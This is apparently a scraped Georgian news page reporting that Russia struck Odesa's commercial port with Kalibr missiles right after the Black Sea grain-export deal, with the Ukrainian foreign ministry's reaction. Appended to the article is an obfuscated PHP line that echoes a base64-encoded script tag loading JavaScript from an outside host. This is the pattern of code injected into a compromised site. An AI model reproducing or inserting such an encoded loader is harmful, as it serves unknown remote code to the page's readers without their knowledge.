celsiusi
ავერსი შნაიდერი
პორტებიდან პორდუქტის ექსპორტზე შეთანხმების მიუხედავად, დღეს დილით რუსეთმა ოდესა დაბომბა. დეპუტატმა ოლექსეი გონჩარენკომ გაავრცელა ინფორმაცია, რომ პორტში ხანძარი იყო.
 
სამხრეთის სარდლობის ცნობით, რუსეთმა ოდესის  სავაჭრო პორტს "კალიბრის" ტიპის საკრუიზო რაკეტები ესროლა.
 
"რუსეთის ფედერაციას 24 საათზე ნაკლები დასჭირდა, რათა ეჭვქვეშ დაეყენებინა გაერო-სა და თურქეთთან მის მიერ მიცემულ შეთანხმებები და დაპირებებში გუშინ სტამბოლში ხელმოწერილ დოკუმენტში ოდესის პორტის ტერიტორიაზე სარაკეტო თავდასხმით", - განაცხადა უკრაინის საგარეო საქმეთა სამინისტროს სპიკერმა.
 
მისი განცხადებით, ეს პუტინის მიერ გაერო-ს გენერალური მდივნის, ანტონიო გუტერეშისა და თურქეთის პრეზიდენტის სახეზე შეფურთხებაა. 
 
საგარეო ხაზს უსვამს შეთანხმებების მკაცრად განხორციელების აუცილებლობას შავი ზღვის გავლით უკრაინული სოფლის მეურნეობის პროდუქტების უსაფრთხო ექსპორტის აღდგენის შესახებ სამი პორტიდან: ოდესა, ჩორნომორსკი და იუჟნი.
 
საგარეო საქმეთა სამინისტრო მოუწოდებს გაერო-ს და თურქეთს, უზრუნველყონ რუსეთის მიერ ნაკისრი ვალდებულებების შესრულება მარცვლეულის დერეფნის უსაფრთხო ფუნქციონირების ფარგლებში.
568
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");